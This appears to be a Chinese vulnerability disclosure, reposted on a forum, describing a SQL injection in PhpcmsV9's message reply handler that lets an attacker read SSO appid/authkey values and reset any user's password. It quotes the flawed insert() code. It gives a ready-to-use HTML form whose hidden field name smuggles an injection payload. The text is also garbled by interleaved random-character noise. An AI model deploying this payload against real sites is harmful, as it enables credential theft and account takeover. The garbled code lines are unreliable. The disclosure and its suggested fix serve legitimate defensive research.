PhpcmsV9 SQL注射修改任意用户密码漏洞

admin

简要描述：

第二发如约来到，感谢大家的关注，在第二发中使用了一个无限制的SQL注射，最终目的可以修改任意用户密码，建议确认安全危害等级为高。

明天再更新下一个漏洞。
详细说明：
在/phpcms9/phpcms/modules/message/index.php中有代码如下：
: _$ ?7 l7 [. F% N; S4 H
$messageid = $this->message_db->insert($_POST['info'],true);


insert方法是key value的，代码如下：
, [3 p6 y/ I) h8 b# I0 r
$ ]) k  ?/ i& H/ J2 Npublic function insert($data, $table, $return_insert_id = false, $replace = false) {
                if(!is_array( $data ) || $table == '' || count($data) == 0) {
* f/ l& N# o4 Q  y( t/ R) e/ j' r                        return false;
0 Q9 U3 Q! n7 M& q                }
               
% k3 J: V5 `& b0 J  E                $fielddata = array_keys($data);
0 v! l8 T$ o8 e: l                $valuedata = array_values($data);
                array_walk($fielddata, array($this, 'add_special_char'));
/ u* o0 ]4 \8 C; U: g; \                array_walk($valuedata, array($this, 'escape_string'));
1 j5 N3 |: r' B6 e' H  a               
6 j8 I1 L9 k# B8 i                $field = implode (',', $fielddata);
                $value = implode (',', $valuedata);
6 _( l; V9 ~  E! Z& ?7 O7 [3 t
                $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
' r- x7 f7 }9 u7 \, R& e2 O; C                $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'`('.$field.') VALUES ('.$value.')';
                $return = $this->execute($sql);
3 q( o0 |5 r6 k8 T0 O/ }0 B) {# |                return $return_insert_id ? $this->insert_id() : $return;
        }

& \, \( Y( Z' O$ j% [$ L8 b; E& m
* z- s# Q) F1 F4 _4 w嗯，很遗憾的是
- G$ L0 j, s: _7 n& i& j- F
: G0 e! U- V! v3 e# t% ?5 Darray_walk($fielddata, array($this, 'add_special_char'));


中并没有对key做任何的过滤，所以，第一段提到的代码导致了一个SQL注射漏洞 ：（。
8 f9 V# r( h  L3 ]# M, [2 F: C7 ?9 G+ k- O
到此，为了poc一下，我读取了我本地的authkey，接下来我已经可以重置任意用户密码了，后面的事情我就没有演示了。
6 P8 U( u' W2 n& C" _
漏洞证明：
读出了phpsso_server的appid和authkey，然后可以调用client.class.php中的ps_member_edit函数修改任意用户密码。


4 g+ |+ W$ j/ P) f/ i0 u: \5 s* S3 M1 ~表单如下：用户名什么的得自己改一改。
: |5 X# q% y  S+ Z( x: J: j<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">
8 i' t- K4 m: U& K0 P/ z<table width="100%" cellspacing="0" class="table_form">
; y6 \( m: n" z* R% S& s<tr>
<th>标 题：</th>
/ \) _9 x1 h* w- A. a# U<td><input name="info[subject]" type="text" id="subject" size="30" value="Re: hh"  class="input-text"/></td>
. A0 c& E$ u6 r; U</tr>
+ |1 p! T$ i, l- a* b+ @<tr>
; E7 V: X3 k! y2 F7 r, m<th>内 容：</th>
# N' [) Y! G% C& R<td><textarea name="info[content]"  id="con" rows="5" cols="50"></textarea></td>
</tr>
$ j/ v) h% k$ b3 A<input type="hidden" name="info[replyid]" value="2" />
<input type="hidden" name="info[send_to_id]" value="cc" />
<input type="hidden" name="info[send_from_id]" value="hh">
2 |: _* d- R* ^<!-- 漏洞的利用重点在这里开始 -->
. B- S# Z1 y( ?. H<input type="hidden" name="info[`status`) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104, 104),1)#]" value="cc" />
* l6 N& x2 W5 ^<!-- 漏洞的利用重点在这里结束 -->
, u; E+ n. m$ ], c<tr>
<th>验证码：</th>
<td><input name="code" type="text" id="code" size="10"  class="input-text"/> <img id='code_img' onclick='this.src=this.src+"&"+Math.random()' src='http://localhost/phpcms9/api.php?op=checkcode&code_len=4&font_size=14&width=110&height=30&font_color=&background='></td>
</tr>
<tr>
$ U% g/ j) F5 H& J; q1 |$ s$ f<td></td>
<td colspan="2"><label>
0 _6 p5 N/ H# K! C$ y" W<input type="submit" name="dosubmit" id="dosubmit" value="确 定" class="button"/>
</label></td>
3 Q; {6 _2 k3 v</tr>
</table>
</form>
* F, O6 }) o% y1 ~1 o$ O' p$ A" ~在add_special_char函数内对key做过滤就可以了。


0 J! C1 W4 l, R